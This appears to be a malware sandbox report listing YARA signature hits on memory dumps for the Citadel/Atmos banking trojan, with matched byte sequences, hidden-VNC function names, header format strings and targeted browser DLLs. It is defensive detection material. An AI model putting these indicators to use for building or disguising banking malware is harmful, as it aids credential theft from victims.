00000025.00000000.2123634235.0000000000C90000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000025.00000000.2123634235.0000000000C90000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000025.00000000.2123634235.0000000000C90000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000025.00000000.2123634235.0000000000C90000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 C9 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 C9 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 C9 00
00000025.00000000.2123634235.0000000000C90000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000000.00000003.1699808293.00000000021C1000.00000004.00000020.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x12be9:$MZ: 4D 5A 0x14177:$MZ: 4D 5A 0x3e6b8:$MZ: 4D 5A 0x3dd84:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 40 00 57 33 DB BF 00 28 00 00 0x3de28:$b: 68 C8 00 00 00 FF 15 4C 12 40 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2ecd0:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2ecf0:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3dbd7:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 40 00
00000019.00000003.2081273338.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000019.00000003.2081273338.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000019.00000003.2081273338.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000019.00000003.2081273338.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 AC 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 AC 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 AC 00
00000019.00000003.2081273338.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000006.00000003.1762790225.000000000C350000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000006.00000003.1762790225.000000000C350000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000006.00000003.1762790225.000000000C350000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000006.00000003.1762790225.000000000C350000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000001.00000003.2282267263.00000000040FC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000001.00000003.2282267263.00000000040FC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000001.00000003.2282267263.00000000040FC000.00000004.00000020.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x8fa8:$c: %BOTID% 0x8fb0:$d: %BOTNET% 0x90c4:$f: bc_remove 0x90d0:$g: bc_add 0x7dc8:$ggurl: http://www.google.com/webhp
00000000.00000002.2171781778.0000000002B50000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000000.00000002.2171781778.0000000002B50000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000000.00000002.2171781778.0000000002B50000.00000004.00000020.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0xa1f8:$c: %BOTID% 0xa200:$d: %BOTNET% 0xa314:$f: bc_remove 0xa320:$g: bc_add 0x9018:$ggurl: http://www.google.com/webhp
00000005.00000000.1737083449.0000000000A50000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000005.00000000.1737083449.0000000000A50000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000005.00000000.1737083449.0000000000A50000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000005.00000000.1737083449.0000000000A50000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 A5 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 A5 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 A5 00
00000005.00000000.1737083449.0000000000A50000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000001.00000000.1699967711.0000000000401000.00000020.00000001.01000000.00000006.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x13339:$MZ: 4D 5A 0x148c7:$MZ: 4D 5A 0x3e4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 40 00 57 33 DB BF 00 28 00 00 0x3e578:$b: 68 C8 00 00 00 FF 15 4C 12 40 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 40 00
00000013.00000003.2022956144.0000000000180000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000013.00000003.2022956144.0000000000180000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000013.00000003.2022956144.0000000000180000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000013.00000003.2022956144.0000000000180000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 18 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 18 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 18 00
00000013.00000003.2022956144.0000000000180000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000020.00000000.2109775705.0000000002530000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000020.00000000.2109775705.0000000002530000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000020.00000000.2109775705.0000000002530000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000020.00000000.2109775705.0000000002530000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
0000000F.00000000.1955460926.0000000000290000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
0000000F.00000000.1955460926.0000000000290000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
0000000F.00000000.1955460926.0000000000290000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
0000000F.00000000.1955460926.0000000000290000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 29 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 29 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 29 00
0000000F.00000000.1955460926.0000000000290000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
0000000F.00000003.1965679095.0000000000290000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
0000000F.00000003.1965679095.0000000000290000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
0000000F.00000003.1965679095.0000000000290000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
0000000F.00000003.1965679095.0000000000290000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 29 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 29 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 29 00
0000000F.00000003.1965679095.0000000000290000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000028.00000002.2974532793.0000000002390000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000028.00000002.2974532793.0000000002390000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000028.00000002.2974532793.0000000002390000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000028.00000002.2974532793.0000000002390000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000010.00000003.1981080900.0000000000580000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000010.00000003.1981080900.0000000000580000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000010.00000003.1981080900.0000000000580000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000010.00000003.1981080900.0000000000580000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 58 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 58 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 58 00
00000010.00000003.1981080900.0000000000580000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000007.00000003.1765021497.0000000000D40000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000007.00000003.1765021497.0000000000D40000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
